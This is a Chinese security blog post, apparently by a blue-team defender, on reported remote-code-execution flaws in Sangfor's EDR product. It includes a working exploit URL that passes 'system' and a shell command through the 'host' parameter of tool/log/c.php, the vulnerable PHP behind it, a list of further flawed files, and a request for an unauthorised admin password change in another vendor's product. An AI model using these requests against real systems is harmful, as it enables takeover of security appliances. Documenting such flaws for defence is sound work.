深信服edr终端漏洞

一、前言

最近这些天来了广州当蓝方，工作之余听到了几个朋友说关于深信服edr爆0day的情况，自己也没时间复现，就简单记录一下。
该XXX简介：
深信服终端检测响应平台EDR，围绕终端资产安全生命周期，通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时，通过云网端联动协同、威胁情报共享、多层级响应机制，帮助用户快速处置终端安全问题，构建轻量级、智能化、响应快的下一代终端安全系统。
**

二、影响范围

fofa上大概有37页 。最近跟着大哥入股了fofa会员能看一万条了，花钱的感觉真爽。
**

然后就是这样的页面，但是现在fofa上的已经进不去了 ，所以我么得复现了。

三、远程命令执行

漏洞位置
host 参数

https://xxx.com:xxx/tool/log/c.php?strip_slashes=system&host=id

这里借用大佬的图

https://xxx.com:xxx/tool/log/c.php?strip_slashes=system&host=pwd

四 、RCE分析

RCE_1

echo "<p><b>Log Helper</b></p>";
    $show_form($_REQUEST);

跟进show_form

/**
 * 显示表单
 * @param array $params 请求参数
 * @return
 */
$show_form = function($params) use(&$strip_slashes, &$show_input) {
    extract($params);
    $host  = isset($host)  ? $strip_slashes($host)  : "127.0.0.1";

RCE_2 任意文件下载漏洞


RCE_3 验证码绕过

RCE_4 、 漏洞文件：tool\log\c.php通过URL传参初始化变量，经典的变量覆盖漏洞。

RCE_5 、 漏洞文件：tool\php_cli.php同样的问题，感觉这个更过分了，bypass waf webshell？

RCE_6、 漏洞文件：tool\ldb_cli.php

五、整改

目前来看，只能暂时下线，没有太好的办法。。。漏洞太多，且个个都是rce。
从源码来看，深信服的开发完全没有经过任何安全开发的培训，导致写出一堆自带严重BUG的代码。。。。

六、后记

天X信漏洞漏洞影响:已知版本号v3.1130.308p3_DLP.1风险等级:高漏洞细节:管理员登陆系统之后修改密码,未采用原由码校验,且存在未授权访问导致存在了越权修改管理员密码.默认用户superman的uid=1POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1

蓝队三大错觉，我能反杀，我能秀，我觉得死不了。结果，红队大佬牛B，一天给半个月活都干完了。这就叫，犀利红队，会注入，会上传，会Xss，会破解，会嗅探，会开发，会业务，会运维，渗透，社工，调戏客服MM，无不精通，祖传三代红队。电话通知后10秒钟上线，身体强壮可持续渗透7天7夜，上千万肉鸡Ddos流量永不停歇，上至深信服、360、融信、下至刷致远OA，刷泛微OA。备用电源，千兆光纤，无线网卡，永不断网，备用电脑一台，发电机二台（含柴油100升）。本人身体强壮，健步如飞，可连续编程20小时不休息，讨论技术方案5小时不喝水，上至带项目、出方案，下至盗号威胁pm，什么都能干。本人意识猥琐，技艺娴熟，0day丰富，能上各种渗透工具，怕延迟可直接接受电话指挥，语音指挥。全面漏洞认识深刻，熟练掌握各种渗透理论，认真学习过《白帽子讲web安全》《Metasploit渗透测试指南》《Web之困》等专业书籍。深山苦练30年，一天只睡4小时，脾气好，不喷人，操作虎，意识强，渗透快，shell多，能过狗，能过盾，听指挥，千里之外取服务器首级，瞬息之间爆管理员菊花，日站如杀鸡，压安全狗如压草芥，第一时间赶到渗透现场。一个月改半月，半个月改一天，天秀吧？本来以为协同作战很流弊。

链接：https://www.adminxe.com/1422.html